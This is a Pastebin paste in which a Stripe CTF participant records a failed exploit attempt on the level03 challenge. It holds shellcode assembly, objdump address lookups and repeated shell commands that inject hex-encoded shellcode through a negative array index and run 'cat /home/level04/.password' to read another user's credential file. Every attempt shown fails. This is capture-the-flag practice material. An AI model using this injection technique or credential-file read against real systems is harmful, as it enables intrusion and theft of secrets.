API tools faq
paste
Advertisement
Guest User

xdissent's level03 fail for stripe ctf

a guest
Feb 24th, 2012
510
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.11 KB | None | 0 0
raw download clone embed print report
  1. level03 fail - https://stripe.com/blog/capture-the-flag
  2.  
  3. Here's what I'm doing:
  4. A negative 5 index points fns[index] to the (non-truncated) string on the stack, moving %eip there.
  5. The %eax register already has the address of the buffer so I add the length of the payload before the command string and set that as the first value on the stack. Then it calls run() or system directly.
  6.  
  7. asm:
  8. add $0xd,%eax
  9. mov %eax,(%esp)
  10. mov $0x0804875b,%eax
  11. call *%eax
  12.  
  13. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<run>"
  14. 0804875b <run>:
  15. level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
  16. Segmentation fault
  17. level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -o level03 /levels/level03.c
  18. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
  19. 0804875b <run>:
  20. level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
  21. Segmentation fault
  22. level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -fno-stack-protector -z execstack -o level03 /levels/level03.c
  23. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
  24. 080486fb <run>:
  25. level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\xfb\x86\x04\x08\xff\xd0cat /home/level04/.password"`"
  26. cat: /home/level04/.password: Permission denied
  27. Segmentation fault
  28. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<system"
  29. 0804847c <system@plt>:
  30. 8048767: e8 10 fd ff ff call 804847c <system@plt>
  31. level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x7c\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
  32. Segmentation fault
  33. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<system"
  34. 08048430 <system@plt>:
  35. 8048707: e8 24 fd ff ff call 8048430 <system@plt>
  36. level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x30\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
  37. cat: /home/level04/.password: Permission denied
  38. Segmentation fault
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!